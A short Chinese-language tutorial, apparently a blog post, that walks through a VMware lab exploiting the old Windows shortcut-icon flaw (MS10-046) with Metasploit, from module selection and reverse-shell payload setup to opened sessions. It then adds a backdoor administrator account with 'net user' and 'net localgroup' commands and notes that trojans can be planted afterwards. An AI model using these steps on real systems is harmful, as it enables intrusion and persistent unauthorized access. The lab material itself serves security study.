Metasploit(msf)系列-利用快捷方式漏洞進行滲透提權
原理:
利用WinXP、Windows2000、Windows2003、Windows Vista等系統存在的漏洞:Windows Shell中的漏洞可能允許遠端執行程式碼,如果顯示特製的快捷方式圖示,則可能允許遠端執行程式碼,成功利用此漏洞的攻擊者擁有與本地使用者相同的使用者許可權。
準備:
靶 機:VMware下的WinXP系統 IP:192.168.1.111
攻擊主機:VMware下的Kali系統 IP:192.168.1.110
在WinXP系統中建立個共享資料夾,右擊選擇屬性,點開共享,按下圖設定
滲透提權過程:
Step1:進入metasploit
Step2:search尋找ms10_046攻擊模組
Step3:使用第一個模組(use + 模組名稱)
Step4:設定payload反彈
Step5:使用show options命令,檢視需設定的引數
這裡需要設定的是SRVHOST、LHOST
Step6:設定SRVHOST、LHOST引數
Step7:exploit生成連結
Step8:在WinXP系統訪問\\192.168.1.110\BBsgRC\,就是訪問共享資料夾
可以看出出現了兩個快捷方式的檔案
Step9:攻擊成功
Step10:sessions -i 2,選擇攻擊模組
Step11:在WinXP系統中訪問http://192.168.1.110:80/
Step12:攻擊成功
Step13:sessions -i 3,選擇攻擊模組,shell進行提權
Step:14:net user檢視WinXP系統使用者
Step15:新增使用者
net user test 789456123 /add
net localgroup Administrators test /add
Step16:檢視test使用者是否成功
之後就可以對該主機進行一些越權的操作了:可以對WinXP系統進行遠端登入、可以在該主機放入木馬檔案、刪除檔案等。